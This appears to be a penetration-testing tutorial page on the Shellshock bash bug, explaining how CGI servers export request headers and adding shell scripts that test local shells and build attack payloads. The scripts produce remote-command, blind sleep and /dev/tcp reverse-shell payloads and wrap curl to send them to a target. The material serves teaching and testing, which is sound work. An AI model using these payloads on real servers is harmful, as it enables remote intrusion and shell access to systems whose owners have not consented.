Shellshock
What is it?
Shellshock (CVE-2014-6271 and its follow-up fixes) is not a configuration flaw but a bug in how bash imported functions from environment variables. If a variable's value began with "() {", bash parsed it as a function definition and then kept executing whatever followed the closing brace, so a value such as "() { :;}; id" ran id the moment a new bash process started. Anything that lets an attacker place text in the environment of a bash process is exposed. The classic case is a web server running CGI scripts: the server exports each request header (User-Agent, Referer, Cookie and so on) as an HTTP_* environment variable of the script, so a script written in bash, or one written in another language that calls popen() or system() on a host where /bin/sh is bash, triggers the bug. (@lcamtuf) Hosts whose /bin/sh is dash are not reachable through system()/popen(), because dash never imported functions from the environment; scripts that explicitly invoke /bin/bash stay vulnerable until bash itself is patched.
Take a site such as http://test.com/serverstats.cgi whose CGI script is written in /bin/bash. The page's source shows that a plain GET request runs the script. Because the server exports every request header into the script's environment and the interpreter is bash, a function-definition payload in the User-Agent, Referer, or Cookie header gives remote code execution on the server.
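To make the mechanism concrete, here is an added example (not from the original page, nor from the SANS demo it draws on): a POSIX shell script that runs the classic local Shellshock check against the shells on this machine, maps a request header name to the CGI environment variable a server would export, and replays an attacker-controlled header through a constructed stand-in for serverstats.cgi. The function names, the header values and the stand-in script are all assumptions made for the demonstration.

```shell
#!/bin/sh
# Added example, not from the original page: reproduce the Shellshock
# mechanism locally and show how a CGI server turns request headers into
# the environment variables that a vulnerable bash imports. The header
# names, values and the stand-in CGI script are constructed for the demo.

# CGI (RFC 3875) maps a request header to HTTP_<NAME>, upper-cased and
# with '-' replaced by '_': User-Agent -> HTTP_USER_AGENT.
cgi_env_name() {
  printf 'HTTP_%s' "$(printf '%s' "$1" | tr 'a-z' 'A-Z' | tr '-' '_')"
}

# The classic local test: export a variable whose value is a function
# definition followed by a trailing command, then start the shell under
# test. A vulnerable bash runs the trailing command while importing the
# function; a patched bash, and dash, leave it alone.
# Exit status: 0 = trailing command ran (vulnerable), 1 = ignored (patched),
# 2 = no such shell on this host.
shellshock_vulnerable() {
  local sh="${1:-bash}" out
  command -v "$sh" >/dev/null 2>&1 || return 2
  out=$(env 'x=() { :;}; echo SHELLSHOCK_TRAILING_COMMAND_RAN' \
        "$sh" -c 'echo benign' 2>/dev/null)
  case "$out" in
    *SHELLSHOCK_TRAILING_COMMAND_RAN*) return 0 ;;
    *) return 1 ;;
  esac
}

# What the web server does with a request for a bash CGI script: export
# each header as HTTP_* and exec the script. $1 = header name,
# $2 = header value (attacker-controlled), $3 = interpreter (default bash).
# stderr is merged so that a patched bash's "ignoring function definition
# attempt" warning shows up next to the normal output.
simulate_cgi_request() {
  local header="$1" value="$2" sh="${3:-bash}" var script
  var=$(cgi_env_name "$header")
  script=$(mktemp)
  # Constructed stand-in for serverstats.cgi: a CGI header block, then a body.
  cat >"$script" <<'EOF'
echo "Content-Type: text/plain"
echo
echo "serverstats: ok"
EOF
  env "$var=$value" "$sh" "$script" 2>&1
  rm -f "$script"
}

# Stand-alone demo: test the local shells, then replay the attack through
# the CGI stand-in. With a patched bash only the warning and the normal
# body appear; on an unpatched bash the output of id comes out first.
for sh in bash sh; do
  if shellshock_vulnerable "$sh"; then echo "$sh: VULNERABLE"
  else case $? in 1) echo "$sh: patched";; *) echo "$sh: not found";; esac; fi
done
simulate_cgi_request User-Agent '() { :;}; echo; /bin/bash -c id'
```

Running it on a patched host is still instructive: the second call prints bash's warning about the ignored function definition, which is exactly the line you will see in a target's error log once the bug is fixed, while the body still comes back unchanged.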
Put an echo in front of the injected command. The CGI interface expects the script's output to start with a header block terminated by a blank line, and the injected command runs before the script prints its own headers. The blank line that echo emits closes an (empty) header block, so the command output is treated as the body; without it the server reads that output as a malformed header and returns a 500 error instead of the result.
Exploiting
You can use the curl command or Burp Repeater to modify the headers quickly.
Burp
Curl
Cheat Sheet
Shellshock Injection Payloads
Blind Shellshock Injection
Reverse Shell Payload
Display Kernel Version
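The following added example (not from the original page) serves both the note above about padding with echo and the cheat-sheet items here. It builds the payload for any command with or without the leading echo, reproduces the header check a CGI server applies to a script's output so the 500 becomes visible offline, times a command for blind, sleep-based detection, and wraps the curl request. The URL, the listener address and port, and the sample CGI outputs are placeholders, and the curl wrapper is not exercised offline.

```shell
#!/bin/sh
# Added example, not from the original page: payload construction and the
# server-side header check that makes the leading "echo" necessary.
# All addresses, ports and sample CGI outputs below are placeholders.

# Build a Shellshock payload for one header value.
#   $1 = command to run on the server
#   $2 = 1 (default) to prefix "echo", 0 to omit it (blind payloads)
# The command is wrapped in single quotes with embedded quotes escaped,
# and handed to /bin/bash -c so that it runs even where /bin/sh is dash.
shellshock_payload() {
  local cmd="$1" pad="${2:-1}" quoted
  quoted=$(printf '%s' "$cmd" | sed "s/'/'\\\\''/g")
  if [ "$pad" = 1 ]; then
    printf "() { :;}; echo; /bin/bash -c '%s'" "$quoted"
  else
    printf "() { :;}; /bin/bash -c '%s'" "$quoted"
  fi
}

# Cheat-sheet items expressed with the builder.
kernel_version_payload() { shellshock_payload 'uname -a'; }
blind_sleep_payload()    { shellshock_payload "sleep ${1:-5}" 0; }
# Reverse shell over bash's /dev/tcp device; $1 = listener host, $2 = port.
# Nothing comes back over HTTP, so no padding is needed.
reverse_shell_payload()  { shellshock_payload "bash -i >& /dev/tcp/$1/$2 0>&1" 0; }

# Reproduce the check mod_cgi applies to a script's stdout: every line up
# to the first blank line must contain ':' (a "Name: value" header),
# otherwise the server logs "malformed header from script" and answers 500.
# Injected command output appears before the script's own headers, so
# without the leading echo it lands inside this header block: a line with
# no ':' (id, /etc/passwd) gives a 500, and a line that happens to contain
# one (the timestamp in uname -a) is silently swallowed as a header.
# Reads CGI output on stdin and prints the status code the server returns.
cgi_status() {
  local line cr
  cr=$(printf '\r')
  while IFS= read -r line; do
    line=${line%"$cr"}
    [ -z "$line" ] && { echo 200; return 0; }
    case "$line" in
      *:*) ;;
      *)   echo 500; return 0 ;;
    esac
  done
  echo 500   # EOF before the blank line that ends the header block
}

# Blind injection gives no output, so time the request instead. Prints
# whole seconds taken by the given command (pair with a sleep payload).
elapsed_seconds() {
  local start end
  start=$(date +%s)
  "$@" >/dev/null 2>&1 || true
  end=$(date +%s)
  echo $((end - start))
}

# Send one request with the payload in the chosen header. Needs network
# access to the target and is not exercised by the offline demo.
#   $1 = URL, $2 = header name (User-Agent, Referer, Cookie), $3 = command
shellshock_curl() {
  curl -s -i -H "$2: $(shellshock_payload "$3")" "$1"
}

# Offline demo: the payloads, and the status a server would return for
# constructed CGI output with and without the padding line.
echo "kernel:   $(kernel_version_payload)"
echo "blind:    $(blind_sleep_payload 5)"
echo "revshell: $(reverse_shell_payload 10.0.0.1 4444)"   # placeholder listener
printf 'uid=33(www-data) gid=33(www-data)\nContent-Type: text/plain\n\n' \
  | cgi_status                                           # 500: no padding
printf '\nuid=33(www-data) gid=33(www-data)\nContent-Type: text/plain\n\n' \
  | cgi_status                                           # 200: echo padding
# Against a real target (placeholder URL), a delay of about 5 s is the signal:
#   elapsed_seconds shellshock_curl http://test.com/serverstats.cgi User-Agent 'sleep 5'
```

Compare the blind measurement with a baseline request carrying a harmless header value before trusting a single delayed response; a loaded server can add seconds on its own.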
Prevention
References
[Ref1]: SANS SEC542 course demo, https://www.sans.org/course/web-app-penetration-testing-ethical-hacking
Picture: https://blog.knapsy.com/blog/2014/10/07/basic-shellshock-exploitation/